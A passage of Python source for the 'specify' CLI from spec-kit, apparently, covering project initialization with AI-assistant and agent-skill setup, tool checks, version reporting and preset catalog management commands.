skill_file.write_text(skill_content, encoding="utf-8")
installed_count += 1
except Exception as e:
console.print(f"[yellow]Warning: Failed to install skill {command_file.stem}: {e}[/yellow]")
continue
if tracker:
if installed_count > 0 and skipped_count > 0:
tracker.complete("ai-skills", f"{installed_count} new + {skipped_count} existing skills in {skills_dir.relative_to(project_path)}")
elif installed_count > 0:
tracker.complete("ai-skills", f"{installed_count} skills → {skills_dir.relative_to(project_path)}")
elif skipped_count > 0:
tracker.complete("ai-skills", f"{skipped_count} skills already present")
else:
tracker.error("ai-skills", "no skills installed")
else:
if installed_count > 0:
console.print(f"[green]✓[/green] Installed {installed_count} agent skills to {skills_dir.relative_to(project_path)}/")
elif skipped_count > 0:
console.print(f"[green]✓[/green] {skipped_count} agent skills already present in {skills_dir.relative_to(project_path)}/")
else:
console.print("[yellow]No skills were installed[/yellow]")
return installed_count > 0 or skipped_count > 0
def _handle_agy_deprecation(console: Console) -> None:
console.print("\n[red]Error:[/red] Explicit command support was deprecated in Antigravity version 1.20.5.")
console.print("Please use [cyan]--ai-skills[/cyan] when initializing to install templates as agent skills instead.")
console.print("[yellow]Usage:[/yellow] specify init <project> --ai agy --ai-skills")
raise typer.Exit(1)
@app.command()
def init(
project_name: str = typer.Argument(None, help="Name for your new project directory (optional if using --here, or use '.' for current directory)"),
ai_assistant: str = typer.Option(None, "--ai", help=AI_ASSISTANT_HELP),
ai_commands_dir: str = typer.Option(None, "--ai-commands-dir", help="Directory for agent command files (required with --ai generic, e.g. .myagent/commands/)"),
script_type: str = typer.Option(None, "--script", help="Script type to use: sh or ps"),
ignore_agent_tools: bool = typer.Option(False, "--ignore-agent-tools", help="Skip checks for AI agent tools like Claude Code"),
no_git: bool = typer.Option(False, "--no-git", help="Skip git repository initialization"),
here: bool = typer.Option(False, "--here", help="Initialize project in the current directory instead of creating a new one"),
force: bool = typer.Option(False, "--force", help="Force merge/overwrite when using --here (skip confirmation)"),
skip_tls: bool = typer.Option(False, "--skip-tls", help="Skip SSL/TLS verification (not recommended)"),
debug: bool = typer.Option(False, "--debug", help="Show verbose diagnostic output for network and extraction failures"),
github_token: str = typer.Option(None, "--github-token", help="GitHub token to use for API requests (or set GH_TOKEN or GITHUB_TOKEN environment variable)"),
ai_skills: bool = typer.Option(False, "--ai-skills", help="Install Prompt.MD templates as agent skills (requires --ai)"),
preset: str = typer.Option(None, "--preset", help="Install a preset during initialization (by preset ID)"),
):
show_banner()
# Detect when option values are likely misinterpreted flags (parameter ordering issue)
if ai_assistant and ai_assistant.startswith("--"):
console.print(f"[red]Error:[/red] Invalid value for --ai: '{ai_assistant}'")
console.print("[yellow]Hint:[/yellow] Did you forget to provide a value for --ai?")
console.print("[yellow]Example:[/yellow] specify init --ai claude --here")
console.print(f"[yellow]Available agents:[/yellow] {', '.join(AGENT_CONFIG.keys())}")
raise typer.Exit(1)
if ai_commands_dir and ai_commands_dir.startswith("--"):
console.print(f"[red]Error:[/red] Invalid value for --ai-commands-dir: '{ai_commands_dir}'")
console.print("[yellow]Hint:[/yellow] Did you forget to provide a value for --ai-commands-dir?")
console.print("[yellow]Example:[/yellow] specify init --ai generic --ai-commands-dir .myagent/commands/")
raise typer.Exit(1)
if ai_assistant:
ai_assistant = AI_ASSISTANT_ALIASES.get(ai_assistant, ai_assistant)
if project_name == ".":
here = True
project_name = None # Clear project_name to use existing validation logic
if here and project_name:
console.print("[red]Error:[/red] Cannot specify both project name and --here flag")
raise typer.Exit(1)
if not here and not project_name:
console.print("[red]Error:[/red] Must specify either a project name, use '.' for current directory, or use --here flag")
raise typer.Exit(1)
if ai_skills and not ai_assistant:
console.print("[red]Error:[/red] --ai-skills requires --ai to be specified")
console.print("[yellow]Usage:[/yellow] specify init <project> --ai <agent> --ai-skills")
raise typer.Exit(1)
if here:
project_name = Path.cwd().name
project_path = Path.cwd()
existing_items = list(project_path.iterdir())
if existing_items:
console.print(f"[yellow]Warning:[/yellow] Current directory is not empty ({len(existing_items)} items)")
console.print("[yellow]Template files will be merged with existing content and may overwrite existing files[/yellow]")
if force:
console.print("[cyan]--force supplied: skipping confirmation and proceeding with merge[/cyan]")
else:
response = typer.confirm("Do you want to continue?")
if not response:
console.print("[yellow]Operation cancelled[/yellow]")
raise typer.Exit(0)
else:
project_path = Path(project_name).resolve()
if project_path.exists():
error_panel = Panel(
f"Directory '[cyan]{project_name}[/cyan]' already exists\n"
"Please choose a different project name or remove the existing directory.",
title="[red]Directory Conflict[/red]",
border_style="red",
padding=(1, 2)
)
console.print()
console.print(error_panel)
raise typer.Exit(1)
if ai_assistant:
if ai_assistant not in AGENT_CONFIG:
console.print(f"[red]Error:[/red] Invalid AI assistant '{ai_assistant}'. Choose from: {', '.join(AGENT_CONFIG.keys())}")
raise typer.Exit(1)
selected_ai = ai_assistant
else:
# Create options dict for selection (agent_key: display_name)
ai_choices = {key: config["name"] for key, config in AGENT_CONFIG.items()}
selected_ai = select_with_arrows(
ai_choices,
"Choose your AI assistant:",
"copilot"
)
# [DEPRECATION NOTICE: Antigravity (agy)]
# As of Antigravity v1.20.5, traditional CLI "command" support was fully removed
# in favor of "Agent Skills" (SKILL.md files under <agent_folder>/skills/<skill_name>/).
# Because 'specify_cli' historically populated .agent/commands/, we now must explicitly
# enforce the `--ai-skills` flag for `agy` to ensure valid template generation.
if selected_ai == "agy" and not ai_skills:
# If agy was selected interactively (no --ai provided), automatically enable
# ai_skills so the agent remains usable without requiring an extra flag.
# Preserve deprecation behavior only for explicit '--ai agy' without skills.
if ai_assistant:
_handle_agy_deprecation(console)
else:
ai_skills = True
console.print(
"\n[yellow]Note:[/yellow] 'agy' was selected interactively; "
"enabling [cyan]--ai-skills[/cyan] automatically for compatibility "
"(explicit .agent/commands usage is deprecated)."
)
# Validate --ai-commands-dir usage
if selected_ai == "generic":
if not ai_commands_dir:
console.print("[red]Error:[/red] --ai-commands-dir is required when using --ai generic")
console.print("[dim]Example: specify init my-project --ai generic --ai-commands-dir .myagent/commands/[/dim]")
raise typer.Exit(1)
elif ai_commands_dir:
console.print(f"[red]Error:[/red] --ai-commands-dir can only be used with --ai generic (not '{selected_ai}')")
raise typer.Exit(1)
current_dir = Path.cwd()
setup_lines = [
"[cyan]Specify Project Setup[/cyan]",
"",
f"{'Project':<15} [green]{project_path.name}[/green]",
f"{'Working Path':<15} [dim]{current_dir}[/dim]",
]
if not here:
setup_lines.append(f"{'Target Path':<15} [dim]{project_path}[/dim]")
console.print(Panel("\n".join(setup_lines), border_style="cyan", padding=(1, 2)))
should_init_git = False
if not no_git:
should_init_git = check_tool("git")
if not should_init_git:
console.print("[yellow]Git not found - will skip repository initialization[/yellow]")
if not ignore_agent_tools:
agent_config = AGENT_CONFIG.get(selected_ai)
if agent_config and agent_config["requires_cli"]:
install_url = agent_config["install_url"]
if not check_tool(selected_ai):
error_panel = Panel(
f"[cyan]{selected_ai}[/cyan] not found\n"
f"Install from: [cyan]{install_url}[/cyan]\n"
f"{agent_config['name']} is required to continue with this project type.\n\n"
"Tip: Use [cyan]--ignore-agent-tools[/cyan] to skip this check",
title="[red]Agent Detection Error[/red]",
border_style="red",
padding=(1, 2)
)
console.print()
console.print(error_panel)
raise typer.Exit(1)
if script_type:
if script_type not in SCRIPT_TYPE_CHOICES:
console.print(f"[red]Error:[/red] Invalid script type '{script_type}'. Choose from: {', '.join(SCRIPT_TYPE_CHOICES.keys())}")
raise typer.Exit(1)
selected_script = script_type
else:
default_script = "ps" if os.name == "nt" else "sh"
if sys.stdin.isatty():
selected_script = select_with_arrows(SCRIPT_TYPE_CHOICES, "Choose script type (or press Enter)", default_script)
else:
selected_script = default_script
console.print(f"[cyan]Selected AI assistant:[/cyan] {selected_ai}")
console.print(f"[cyan]Selected script type:[/cyan] {selected_script}")
tracker = StepTracker("Initialize Specify Project")
sys._specify_tracker_active = True
tracker.add("precheck", "Check required tools")
tracker.complete("precheck", "ok")
tracker.add("ai-select", "Select AI assistant")
tracker.complete("ai-select", f"{selected_ai}")
tracker.add("script-select", "Select script type")
tracker.complete("script-select", selected_script)
for key, label in [
("fetch", "Fetch latest release"),
("download", "Download template"),
("extract", "Extract template"),
("zip-list", "Archive contents"),
("extracted-summary", "Extraction summary"),
("chmod", "Ensure scripts executable"),
("constitution", "Constitution setup"),
]:
tracker.add(key, label)
if ai_skills:
tracker.add("ai-skills", "Install agent skills")
for key, label in [
("cleanup", "Cleanup"),
("git", "Initialize git repository"),
("final", "Finalize")
]:
tracker.add(key, label)
# Track git error message outside Live context so it persists
git_error_message = None
with Live(tracker.render(), console=console, refresh_per_second=8, transient=True) as live:
tracker.attach_refresh(lambda: live.update(tracker.render()))
try:
verify = not skip_tls
local_ssl_context = ssl_context if verify else False
local_client = httpx.Client(verify=local_ssl_context)
download_and_extract_template(project_path, selected_ai, selected_script, here, verbose=False, tracker=tracker, client=local_client, debug=debug, github_token=github_token)
# For generic agent, rename placeholder directory to user-specified path
if selected_ai == "generic" and ai_commands_dir:
placeholder_dir = project_path / ".speckit" / "commands"
target_dir = project_path / ai_commands_dir
if placeholder_dir.is_dir():
target_dir.parent.mkdir(parents=True, exist_ok=True)
shutil.move(str(placeholder_dir), str(target_dir))
# Clean up empty .speckit dir if it's now empty
speckit_dir = project_path / ".speckit"
if speckit_dir.is_dir() and not any(speckit_dir.iterdir()):
speckit_dir.rmdir()
ensure_executable_scripts(project_path, tracker=tracker)
ensure_constitution_from_template(project_path, tracker=tracker)
if ai_skills:
skills_ok = install_ai_skills(project_path, selected_ai, tracker=tracker)
# When --ai-skills is used on a NEW project and skills were
# successfully installed, remove the command files that the
# template archive just created. Skills replace commands, so
# keeping both would be confusing. For --here on an existing
# repo we leave pre-existing commands untouched to avoid a
# breaking change. We only delete AFTER skills succeed so the
# project always has at least one of {commands, skills}.
if skills_ok and not here:
agent_cfg = AGENT_CONFIG.get(selected_ai, {})
agent_folder = agent_cfg.get("folder", "")
commands_subdir = agent_cfg.get("commands_subdir", "commands")
if agent_folder:
cmds_dir = project_path / agent_folder.rstrip("/") / commands_subdir
if cmds_dir.exists():
try:
shutil.rmtree(cmds_dir)
except OSError:
# Best-effort cleanup: skills are already installed,
# so leaving stale commands is non-fatal.
console.print("[yellow]Warning: could not remove extracted commands directory[/yellow]")
if not no_git:
tracker.start("git")
if is_git_repo(project_path):
tracker.complete("git", "existing repo detected")
elif should_init_git:
success, error_msg = init_git_repo(project_path, quiet=True)
if success:
tracker.complete("git", "initialized")
else:
tracker.error("git", "init failed")
git_error_message = error_msg
else:
tracker.skip("git", "git not available")
else:
tracker.skip("git", "--no-git flag")
# Persist the CLI options so later operations (e.g. preset add)
# can adapt their behaviour without re-scanning the filesystem.
# Must be saved BEFORE preset install so _get_skills_dir() works.
save_init_options(project_path, {
"ai": selected_ai,
"ai_skills": ai_skills,
"ai_commands_dir": ai_commands_dir,
"here": here,
"preset": preset,
"script": selected_script,
"speckit_version": get_speckit_version(),
})
# Install preset if specified
if preset:
try:
from .presets import PresetManager, PresetCatalog, PresetError
preset_manager = PresetManager(project_path)
speckit_ver = get_speckit_version()
# Try local directory first, then catalog
local_path = Path(preset).resolve()
if local_path.is_dir() and (local_path / "preset.yml").exists():
preset_manager.install_from_directory(local_path, speckit_ver)
else:
preset_catalog = PresetCatalog(project_path)
pack_info = preset_catalog.get_pack_info(preset)
if not pack_info:
console.print(f"[yellow]Warning:[/yellow] Preset '{preset}' not found in catalog. Skipping.")
else:
try:
zip_path = preset_catalog.download_pack(preset)
preset_manager.install_from_zip(zip_path, speckit_ver)
# Clean up downloaded ZIP to avoid cache accumulation
try:
zip_path.unlink(missing_ok=True)
except OSError:
# Best-effort cleanup; failure to delete is non-fatal
pass
except PresetError as preset_err:
console.print(f"[yellow]Warning:[/yellow] Failed to install preset '{preset}': {preset_err}")
except Exception as preset_err:
console.print(f"[yellow]Warning:[/yellow] Failed to install preset: {preset_err}")
tracker.complete("final", "project ready")
except Exception as e:
tracker.error("final", str(e))
console.print(Panel(f"Initialization failed: {e}", title="Failure", border_style="red"))
if debug:
_env_pairs = [
("Python", sys.version.split()[0]),
("Platform", sys.platform),
("CWD", str(Path.cwd())),
]
_label_width = max(len(k) for k, _ in _env_pairs)
env_lines = [f"{k.ljust(_label_width)} → [bright_black]{v}[/bright_black]" for k, v in _env_pairs]
console.print(Panel("\n".join(env_lines), title="Debug Environment", border_style="magenta"))
if not here and project_path.exists():
shutil.rmtree(project_path)
raise typer.Exit(1)
finally:
pass
console.print(tracker.render())
console.print("\n[bold green]Project ready.[/bold green]")
# Show git error details if initialization failed
if git_error_message:
console.print()
git_error_panel = Panel(
f"[yellow]Warning:[/yellow] Git repository initialization failed\n\n"
f"{git_error_message}\n\n"
f"[dim]You can initialize git manually later with:[/dim]\n"
f"[cyan]cd {project_path if not here else '.'}[/cyan]\n"
f"[cyan]git init[/cyan]\n"
f"[cyan]git add .[/cyan]\n"
f"[cyan]git commit -m \"Initial commit\"[/cyan]",
title="[red]Git Initialization Failed[/red]",
border_style="red",
padding=(1, 2)
)
console.print(git_error_panel)
# Agent folder security notice
agent_config = AGENT_CONFIG.get(selected_ai)
if agent_config:
agent_folder = ai_commands_dir if selected_ai == "generic" else agent_config["folder"]
if agent_folder:
security_notice = Panel(
f"Some agents may store credentials, auth tokens, or other identifying and private artifacts in the agent folder within your project.\n"
f"Consider adding [cyan]{agent_folder}[/cyan] (or parts of it) to [cyan].gitignore[/cyan] to prevent accidental credential leakage.",
title="[yellow]Agent Folder Security[/yellow]",
border_style="yellow",
padding=(1, 2)
)
console.print()
console.print(security_notice)
steps_lines = []
if not here:
steps_lines.append(f"1. Go to the project folder: [cyan]cd {project_name}[/cyan]")
step_num = 2
else:
steps_lines.append("1. You're already in the project directory!")
step_num = 2
# Add Codex-specific setup step if needed
if selected_ai == "codex":
codex_path = project_path / ".codex"
quoted_path = shlex.quote(str(codex_path))
if os.name == "nt": # Windows
cmd = f"setx CODEX_HOME {quoted_path}"
else: # Unix-like systems
cmd = f"export CODEX_HOME={quoted_path}"
steps_lines.append(f"{step_num}. Set [cyan]CODEX_HOME[/cyan] environment variable before running Codex: [cyan]{cmd}[/cyan]")
step_num += 1
steps_lines.append(f"{step_num}. Start using slash commands with your AI agent:")
steps_lines.append(" 2.1 [cyan]/speckit.constitution[/] - Establish project principles")
steps_lines.append(" 2.2 [cyan]/speckit.specify[/] - Create baseline specification")
steps_lines.append(" 2.3 [cyan]/speckit.plan[/] - Create implementation plan")
steps_lines.append(" 2.4 [cyan]/speckit.tasks[/] - Generate actionable tasks")
steps_lines.append(" 2.5 [cyan]/speckit.implement[/] - Execute implementation")
steps_panel = Panel("\n".join(steps_lines), title="Next Steps", border_style="cyan", padding=(1,2))
console.print()
console.print(steps_panel)
enhancement_lines = [
"Optional commands that you can use for your specs [bright_black](improve quality & confidence)[/bright_black]",
"",
"○ [cyan]/speckit.clarify[/] [bright_black](optional)[/bright_black] - Ask structured questions to de-risk ambiguous areas before planning (run before [cyan]/speckit.plan[/] if used)",
"○ [cyan]/speckit.analyze[/] [bright_black](optional)[/bright_black] - Cross-artifact consistency & alignment report (after [cyan]/speckit.tasks[/], before [cyan]/speckit.implement[/])",
"○ [cyan]/speckit.checklist[/] [bright_black](optional)[/bright_black] - Generate quality checklists to validate requirements completeness, clarity, and consistency (after [cyan]/speckit.plan[/])"
]
enhancements_panel = Panel("\n".join(enhancement_lines), title="Enhancement Commands", border_style="cyan", padding=(1,2))
console.print()
console.print(enhancements_panel)
@app.command()
def check():
show_banner()
console.print("[bold]Checking for installed tools...[/bold]\n")
tracker = StepTracker("Check Available Tools")
tracker.add("git", "Git version control")
git_ok = check_tool("git", tracker=tracker)
agent_results = {}
for agent_key, agent_config in AGENT_CONFIG.items():
if agent_key == "generic":
continue # Generic is not a real agent to check
agent_name = agent_config["name"]
requires_cli = agent_config["requires_cli"]
tracker.add(agent_key, agent_name)
if requires_cli:
agent_results[agent_key] = check_tool(agent_key, tracker=tracker)
else:
# IDE-based agent - skip CLI check and mark as optional
tracker.skip(agent_key, "IDE-based, no CLI check")
agent_results[agent_key] = False # Don't count IDE agents as "found"
# Check VS Code variants (not in agent config)
tracker.add("code", "Visual Studio Code")
check_tool("code", tracker=tracker)
tracker.add("code-insiders", "Visual Studio Code Insiders")
check_tool("code-insiders", tracker=tracker)
console.print(tracker.render())
console.print("\n[bold green]Specify CLI is ready to use![/bold green]")
if not git_ok:
console.print("[dim]Tip: Install git for repository management[/dim]")
if not any(agent_results.values()):
console.print("[dim]Tip: Install an AI assistant for the best experience[/dim]")
@app.command()
def version():
import platform
import importlib.metadata
show_banner()
# Get CLI version from package metadata
cli_version = "unknown"
try:
cli_version = importlib.metadata.version("specify-cli")
except Exception:
# Fallback: try reading from pyproject.toml if running from source
try:
import tomllib
pyproject_path = Path(__file__).parent.parent.parent / "pyproject.toml"
if pyproject_path.exists():
with open(pyproject_path, "rb") as f:
data = tomllib.load(f)
cli_version = data.get("project", {}).get("version", "unknown")
except Exception:
pass
# Fetch latest template release version
repo_owner = "github"
repo_name = "spec-kit"
api_url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/releases/latest"
template_version = "unknown"
release_date = "unknown"
try:
response = client.get(
api_url,
timeout=10,
follow_redirects=True,
headers=_github_auth_headers(),
)
if response.status_code == 200:
release_data = response.json()
template_version = release_data.get("tag_name", "unknown")
# Remove 'v' prefix if present
if template_version.startswith("v"):
template_version = template_version[1:]
release_date = release_data.get("published_at", "unknown")
if release_date != "unknown":
# Format the date nicely
try:
dt = datetime.fromisoformat(release_date.replace('Z', '+00:00'))
release_date = dt.strftime("%Y-%m-%d")
except Exception:
pass
except Exception:
pass
info_table = Table(show_header=False, box=None, padding=(0, 2))
info_table.add_column("Key", style="cyan", justify="right")
info_table.add_column("Value", style="white")
info_table.add_row("CLI Version", cli_version)
info_table.add_row("Template Version", template_version)
info_table.add_row("Released", release_date)
info_table.add_row("", "")
info_table.add_row("Python", platform.python_version())
info_table.add_row("Platform", platform.system())
info_table.add_row("Architecture", platform.machine())
info_table.add_row("OS Version", platform.version())
panel = Panel(
info_table,
title="[bold cyan]Specify CLI Information[/bold cyan]",
border_style="cyan",
padding=(1, 2)
)
console.print(panel)
console.print()
# ===== Extension Commands =====
extension_app = typer.Typer(
name="extension",
help="Manage spec-kit extensions",
add_completion=False,
)
app.add_typer(extension_app, name="extension")
catalog_app = typer.Typer(
name="catalog",
help="Manage extension catalogs",
add_completion=False,
)
extension_app.add_typer(catalog_app, name="catalog")
preset_app = typer.Typer(
name="preset",
help="Manage spec-kit presets",
add_completion=False,
)
app.add_typer(preset_app, name="preset")
preset_catalog_app = typer.Typer(
name="catalog",
help="Manage preset catalogs",
add_completion=False,
)
preset_app.add_typer(preset_catalog_app, name="catalog")
def get_speckit_version() -> str:
import importlib.metadata
try:
return importlib.metadata.version("specify-cli")
except Exception:
# Fallback: try reading from pyproject.toml
try:
import tomllib
pyproject_path = Path(__file__).parent.parent.parent / "pyproject.toml"
if pyproject_path.exists():
with open(pyproject_path, "rb") as f:
data = tomllib.load(f)
return data.get("project", {}).get("version", "unknown")
except Exception:
# Intentionally ignore any errors while reading/parsing pyproject.toml.
# If this lookup fails for any reason, we fall back to returning "unknown" below.
pass
return "unknown"
# ===== Preset Commands =====
@preset_app.command("list")
def preset_list():
from .presets import PresetManager
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
manager = PresetManager(project_root)
installed = manager.list_installed()
if not installed:
console.print("[yellow]No presets installed.[/yellow]")
console.print("\nInstall a preset with:")
console.print(" [cyan]specify preset add <pack-name>[/cyan]")
return
console.print("\n[bold cyan]Installed Presets:[/bold cyan]\n")
for pack in installed:
status = "[green]enabled[/green]" if pack.get("enabled", True) else "[red]disabled[/red]"
pri = pack.get('priority', 10)
console.print(f" [bold]{pack['name']}[/bold] ({pack['id']}) v{pack['version']} — {status} — priority {pri}")
console.print(f" {pack['description']}")
if pack.get("tags"):
tags_str = ", ".join(pack["tags"])
console.print(f" [dim]Tags: {tags_str}[/dim]")
console.print(f" [dim]Templates: {pack['template_count']}[/dim]")
console.print()
@preset_app.command("add")
def preset_add(
pack_id: str = typer.Argument(None, help="Preset ID to install from catalog"),
from_url: str = typer.Option(None, "--from", help="Install from a URL (ZIP file)"),
dev: str = typer.Option(None, "--dev", help="Install from local directory (development mode)"),
priority: int = typer.Option(10, "--priority", help="Resolution priority (lower = higher precedence, default 10)"),
):
from .presets import (
PresetManager,
PresetCatalog,
PresetError,
PresetValidationError,
PresetCompatibilityError,
)
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
# Validate priority
if priority < 1:
console.print("[red]Error:[/red] Priority must be a positive integer (1 or higher)")
raise typer.Exit(1)
manager = PresetManager(project_root)
speckit_version = get_speckit_version()
try:
if dev:
dev_path = Path(dev).resolve()
if not dev_path.exists():
console.print(f"[red]Error:[/red] Directory not found: {dev}")
raise typer.Exit(1)
console.print(f"Installing preset from [cyan]{dev_path}[/cyan]...")
manifest = manager.install_from_directory(dev_path, speckit_version, priority)
console.print(f"[green]✓[/green] Preset '{manifest.name}' v{manifest.version} installed (priority {priority})")
elif from_url:
# Validate URL scheme before downloading
from urllib.parse import urlparse as _urlparse
_parsed = _urlparse(from_url)
_is_localhost = _parsed.hostname in ("localhost", "127.0.0.1", "::1")
if _parsed.scheme != "https" and not (_parsed.scheme == "http" and _is_localhost):
console.print(f"[red]Error:[/red] URL must use HTTPS (got {_parsed.scheme}://). HTTP is only allowed for localhost.")
raise typer.Exit(1)
console.print(f"Installing preset from [cyan]{from_url}[/cyan]...")
import urllib.request
import urllib.error
import tempfile
with tempfile.TemporaryDirectory() as tmpdir:
zip_path = Path(tmpdir) / "preset.zip"
try:
with urllib.request.urlopen(from_url, timeout=60) as response:
zip_path.write_bytes(response.read())
except urllib.error.URLError as e:
console.print(f"[red]Error:[/red] Failed to download: {e}")
raise typer.Exit(1)
manifest = manager.install_from_zip(zip_path, speckit_version, priority)
console.print(f"[green]✓[/green] Preset '{manifest.name}' v{manifest.version} installed (priority {priority})")
elif pack_id:
catalog = PresetCatalog(project_root)
pack_info = catalog.get_pack_info(pack_id)
if not pack_info:
console.print(f"[red]Error:[/red] Preset '{pack_id}' not found in catalog")
raise typer.Exit(1)
if not pack_info.get("_install_allowed", True):
catalog_name = pack_info.get("_catalog_name", "unknown")
console.print(f"[red]Error:[/red] Preset '{pack_id}' is from the '{catalog_name}' catalog which is discovery-only (install not allowed).")
console.print("Add the catalog with --install-allowed or install from the preset's repository directly with --from.")
raise typer.Exit(1)
console.print(f"Installing preset [cyan]{pack_info.get('name', pack_id)}[/cyan]...")
try:
zip_path = catalog.download_pack(pack_id)
manifest = manager.install_from_zip(zip_path, speckit_version, priority)
console.print(f"[green]✓[/green] Preset '{manifest.name}' v{manifest.version} installed (priority {priority})")
finally:
if 'zip_path' in locals() and zip_path.exists():
zip_path.unlink(missing_ok=True)
else:
console.print("[red]Error:[/red] Specify a preset ID, --from URL, or --dev path")
raise typer.Exit(1)
except PresetCompatibilityError as e:
console.print(f"[red]Compatibility Error:[/red] {e}")
raise typer.Exit(1)
except PresetValidationError as e:
console.print(f"[red]Validation Error:[/red] {e}")
raise typer.Exit(1)
except PresetError as e:
console.print(f"[red]Error:[/red] {e}")
raise typer.Exit(1)
@preset_app.command("remove")
def preset_remove(
pack_id: str = typer.Argument(..., help="Preset ID to remove"),
):
from .presets import PresetManager
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
manager = PresetManager(project_root)
if not manager.registry.is_installed(pack_id):
console.print(f"[red]Error:[/red] Preset '{pack_id}' is not installed")
raise typer.Exit(1)
if manager.remove(pack_id):
console.print(f"[green]✓[/green] Preset '{pack_id}' removed successfully")
else:
console.print(f"[red]Error:[/red] Failed to remove preset '{pack_id}'")
raise typer.Exit(1)
@preset_app.command("search")
def preset_search(
query: str = typer.Argument(None, help="Search query"),
tag: str = typer.Option(None, "--tag", help="Filter by tag"),
author: str = typer.Option(None, "--author", help="Filter by author"),
):
from .presets import PresetCatalog, PresetError
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
catalog = PresetCatalog(project_root)
try:
results = catalog.search(query=query, tag=tag, author=author)
except PresetError as e:
console.print(f"[red]Error:[/red] {e}")
raise typer.Exit(1)
if not results:
console.print("[yellow]No presets found matching your criteria.[/yellow]")
return
console.print(f"\n[bold cyan]Presets ({len(results)} found):[/bold cyan]\n")
for pack in results:
console.print(f" [bold]{pack.get('name', pack['id'])}[/bold] ({pack['id']}) v{pack.get('version', '?')}")
console.print(f" {pack.get('description', '')}")
if pack.get("tags"):
tags_str = ", ".join(pack["tags"])
console.print(f" [dim]Tags: {tags_str}[/dim]")
console.print()
@preset_app.command("resolve")
def preset_resolve(
template_name: str = typer.Argument(..., help="Template name to resolve (e.g., spec-template)"),
):
from .presets import PresetResolver
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
resolver = PresetResolver(project_root)
result = resolver.resolve_with_source(template_name)
if result:
console.print(f" [bold]{template_name}[/bold]: {result['path']}")
console.print(f" [dim](from: {result['source']})[/dim]")
else:
console.print(f" [yellow]{template_name}[/yellow]: not found")
console.print(" [dim]No template with this name exists in the resolution stack[/dim]")
@preset_app.command("info")
def preset_info(
pack_id: str = typer.Argument(..., help="Preset ID to get info about"),
):
from .extensions import normalize_priority
from .presets import PresetCatalog, PresetManager, PresetError
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
# Check if installed locally first
manager = PresetManager(project_root)
local_pack = manager.get_pack(pack_id)
if local_pack:
console.print(f"\n[bold cyan]Preset: {local_pack.name}[/bold cyan]\n")
console.print(f" ID: {local_pack.id}")
console.print(f" Version: {local_pack.version}")
console.print(f" Description: {local_pack.description}")
if local_pack.author:
console.print(f" Author: {local_pack.author}")
if local_pack.tags:
console.print(f" Tags: {', '.join(local_pack.tags)}")
console.print(f" Templates: {len(local_pack.templates)}")
for tmpl in local_pack.templates:
console.print(f" - {tmpl['name']} ({tmpl['type']}): {tmpl.get('description', '')}")
repo = local_pack.data.get("preset", {}).get("repository")
if repo:
console.print(f" Repository: {repo}")
license_val = local_pack.data.get("preset", {}).get("license")
if license_val:
console.print(f" License: {license_val}")
console.print("\n [green]Status: installed[/green]")
# Get priority from registry
pack_metadata = manager.registry.get(pack_id)
priority = normalize_priority(pack_metadata.get("priority") if isinstance(pack_metadata, dict) else None)
console.print(f" [dim]Priority:[/dim] {priority}")
console.print()
return
# Fall back to catalog
catalog = PresetCatalog(project_root)
try:
pack_info = catalog.get_pack_info(pack_id)
except PresetError:
pack_info = None
if not pack_info:
console.print(f"[red]Error:[/red] Preset '{pack_id}' not found (not installed and not in catalog)")
raise typer.Exit(1)
console.print(f"\n[bold cyan]Preset: {pack_info.get('name', pack_id)}[/bold cyan]\n")
console.print(f" ID: {pack_info['id']}")
console.print(f" Version: {pack_info.get('version', '?')}")
console.print(f" Description: {pack_info.get('description', '')}")
if pack_info.get("author"):
console.print(f" Author: {pack_info['author']}")
if pack_info.get("tags"):
console.print(f" Tags: {', '.join(pack_info['tags'])}")
if pack_info.get("repository"):
console.print(f" Repository: {pack_info['repository']}")
if pack_info.get("license"):
console.print(f" License: {pack_info['license']}")
console.print("\n [yellow]Status: not installed[/yellow]")
console.print(f" Install with: [cyan]specify preset add {pack_id}[/cyan]")
console.print()
@preset_app.command("set-priority")
def preset_set_priority(
pack_id: str = typer.Argument(help="Preset ID"),
priority: int = typer.Argument(help="New priority (lower = higher precedence)"),
):
from .presets import PresetManager
project_root = Path.cwd()
# Check if we're in a spec-kit project
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
# Validate priority
if priority < 1:
console.print("[red]Error:[/red] Priority must be a positive integer (1 or higher)")
raise typer.Exit(1)
manager = PresetManager(project_root)
# Check if preset is installed
if not manager.registry.is_installed(pack_id):
console.print(f"[red]Error:[/red] Preset '{pack_id}' is not installed")
raise typer.Exit(1)
# Get current metadata
metadata = manager.registry.get(pack_id)
if metadata is None or not isinstance(metadata, dict):
console.print(f"[red]Error:[/red] Preset '{pack_id}' not found in registry (corrupted state)")
raise typer.Exit(1)
from .extensions import normalize_priority
raw_priority = metadata.get("priority")
# Only skip if the stored value is already a valid int equal to requested priority
# This ensures corrupted values (e.g., "high") get repaired even when setting to default (10)
if isinstance(raw_priority, int) and raw_priority == priority:
console.print(f"[yellow]Preset '{pack_id}' already has priority {priority}[/yellow]")
raise typer.Exit(0)
old_priority = normalize_priority(raw_priority)
# Update priority
manager.registry.update(pack_id, {"priority": priority})
console.print(f"[green]✓[/green] Preset '{pack_id}' priority changed: {old_priority} → {priority}")
console.print("\n[dim]Lower priority = higher precedence in template resolution[/dim]")
